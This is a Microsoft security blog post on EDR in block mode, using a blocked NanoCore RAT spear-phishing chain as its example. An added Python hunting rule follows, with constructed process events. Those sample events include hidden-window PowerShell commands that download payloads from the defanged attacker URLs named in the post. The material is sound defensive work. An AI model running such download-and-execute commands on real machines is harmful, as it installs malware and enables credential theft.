Endpoint detection and response (EDR) in block mode is a new capability in Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP) that turns EDR detections into blocking and containment of malicious behaviors. This capability uses Microsoft Defender ATP’s industry-leading visibility and detection capability to provide an additional layer of post-breach blocking of malicious behavior, malware, and other artifacts that your primary antivirus solution might miss.
Through built-in machine learning models in Microsoft Defender ATP, EDR in block mode extends behavioral blocking and containment, which uses machine learning-driven protection engines that specialize in detecting threats by analyzing behavior. The ability of this feature to detect and stop threats in real time, even after they have started running, empowers organizations to thwart cyberattacks, maintain security posture, and reduce the manual steps and time to respond to threats.
When EDR in block mode detects malicious behaviors or artifacts, it stops related running processes, blocking the attack from progressing. These blocks are reported in Microsoft Defender Security Center, where security teams can see details of the threat and remediation status, and use Microsoft Defender ATP’s rich set of capabilities to further investigate and hunt for similar threats as necessary.
Figure 1. Sample Microsoft Defender ATP alert on threat caught by EDR in block mode
EDR in block mode was developed in close collaboration with customers, and is in public preview starting today. We thank our customers for the partnership and for the invaluable feedback during the limited preview, during which the feature blocked multiple real-world attacks. In this blog, we’ll share details about one of these attacks.
EDR block mode in action
In April of this year, EDR in block mode protected and blocked a NanoCore RAT attack that aimed to steal credentials, spy using a device’s camera, and pilfer other information. The attack started with a spear-phishing email carrying a malicious Excel attachment. The Excel file contained a malicious macro that, when enabled, ran PowerShell code that in turn downloaded and ran a file from hxxp://office-services-labs[.]com/Scan.exe.
Figure 2. Malicious Excel file used in NanoCore campaign
The organization’s non-Microsoft antivirus solution didn’t detect the Excel file or its behavior, but Microsoft Defender ATP did. EDR in block mode kicked in, stopping the download behavior and blocking the PowerShell code and Excel file. This was reported in the Microsoft Defender Security Center, alerting the security team about the blocked behavior. While the threat was automatically remediated, the alert empowers the security team to perform additional investigation and hunting for similar threats.
Figure 3. EDR in block mode alert in Microsoft Defender Security Center
Had the attack been allowed to continue, the downloaded file Scan.exe would have run the following PowerShell commands, which would have downloaded the payload, a NanoCore variant, from hxxp://paste[.]ee/r/Pym5k:
Figure 4. Malicious PowerShell commands used by NanoCore campaign
NanoCore is a family of remote access Trojans (RATs) that gather information about the affected device and operating system. It is designed to steal credentials, spy through cameras, and carry out other malicious activities. With EDR in block mode, Microsoft Defender ATP protected against the damaging impact of a successful NanoCore infection.
Figure 5. NanoCore RAT attack chain
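As an added example (not part of the original post and not Microsoft's code), the following Python sketches the kind of hunting logic a security team could run over process-creation events to find chains like the one described above: an Office application whose descendant PowerShell process issues a download command, with a dropped binary or an intermediate shell allowed in between. The event schema, the sample events and the command-line patterns are constructed assumptions for this example, not any vendor's telemetry format; the two defanged URLs in the sample are the ones quoted in the post.

```python
"""Added example (not Microsoft's or the post's code): a small detector for
an Office application whose descendant shell process issues a download
command.  Event field names and the sample events are constructed for this
example, not any vendor's schema."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "mshta.exe"}

# Command-line fragments that indicate a download (cmdlets, .NET WebClient, curl/wget).
DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|start-bitstransfer|\bcurl\b|\bwget\b",
    re.IGNORECASE,
)
# Accept both live (http) and defanged (hxxp) URLs so IoCs from a report parse as-is.
URL_RE = re.compile(r"h(?:tt|xx)ps?://[^\s'\"()]+", re.IGNORECASE)


@dataclass
class ProcessEvent:
    pid: int
    ppid: int
    image: str      # executable file name as logged (assumed field)
    cmdline: str


@dataclass
class Finding:
    pid: int                # the shell process that issued the download
    office_app: str         # the Office ancestor that started the chain
    depth: int              # parent hops between the shell and the Office app
    urls: list[str] = field(default_factory=list)


def find_office_download_chains(events, max_depth=3):
    """Return one Finding per shell process that (a) has a download command on
    its command line and (b) descends from an Office application within
    max_depth parent hops.  Downloads with no Office ancestor are ignored, so
    ordinary admin scripts do not trip the rule."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        if ev.image.lower() not in SHELLS or not DOWNLOAD_RE.search(ev.cmdline):
            continue
        ancestor, depth = by_pid.get(ev.ppid), 1
        while ancestor is not None and depth <= max_depth:
            if ancestor.image.lower() in OFFICE_APPS:
                findings.append(Finding(ev.pid, ancestor.image.lower(), depth,
                                        URL_RE.findall(ev.cmdline)))
                break
            ancestor, depth = by_pid.get(ancestor.ppid), depth + 1
    return findings


# Constructed sample events modelled on the chain in the post: Excel -> PowerShell
# fetches Scan.exe -> Scan.exe -> PowerShell fetches the second stage.
SAMPLE_EVENTS = [
    ProcessEvent(100, 1, "explorer.exe", "explorer.exe"),
    ProcessEvent(200, 100, "EXCEL.EXE", r"EXCEL.EXE C:\Users\alice\Downloads\invoice.xls"),
    ProcessEvent(300, 200, "powershell.exe",
                 r"powershell.exe -w hidden -c (New-Object Net.WebClient).DownloadFile("
                 r"'hxxp://office-services-labs[.]com/Scan.exe','C:\Users\Public\Scan.exe')"),
    ProcessEvent(600, 300, "Scan.exe", r"C:\Users\Public\Scan.exe"),
    ProcessEvent(700, 600, "powershell.exe",
                 "powershell.exe -nop -c (New-Object Net.WebClient).DownloadString("
                 "'hxxp://paste[.]ee/r/Pym5k')"),
    # Benign activity that must not be flagged: no download, or no Office ancestor.
    ProcessEvent(400, 100, "powershell.exe", "powershell.exe -c Get-Process"),
    ProcessEvent(500, 100, "powershell.exe",
                 "powershell.exe -c Invoke-WebRequest https://intranet.example/update.ps1"),
]


def main():
    for f in find_office_download_chains(SAMPLE_EVENTS):
        print(f"pid {f.pid}: {f.office_app} -> download {f.depth} hop(s) away: {f.urls}")


if __name__ == "__main__":
    main()
```

Run as a script, the detector reports pid 300 (Excel is its direct parent) and pid 700 (Excel is three hops up, through Scan.exe and the first PowerShell), and ignores the two PowerShell processes started from Explorer. The `max_depth` bound is the knob to tune: a small value keeps the rule tight, a larger one catches chains that insert extra intermediaries such as cmd.exe before the download.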
Turning on EDR in block mode
EDR in block mode is in public preview starting today, so if you have preview features turned on in Microsoft Defender Security Center, you can try it now. Once you’ve opted in, turning on EDR in block mode is simple. Go to Settings > Advanced features. Switch the toggle for “Enable EDR in block mode” to On.
Figure 6. Microsoft Defender Security Center Advanced features settings
Security teams are also informed about this feature via the security recommendation titled, “Enable EDR in block mode” in threat and vulnerability management.
Figure 7. EDR in block mode in security recommendations
To learn more about the behavioral blocking and containment capabilities in Microsoft Defender ATP, watch this SANS Webcast, refer to our documentation, and read this blog.
If you’re not yet taking advantage of Microsoft’s industry-leading security optics and detection capabilities for endpoints, sign up for a free trial of Microsoft Defender ATP today.
We welcome your feedback. If you have any comments or questions, let us know.
Jeong Mun and Shweta Jha
Microsoft Defender ATP team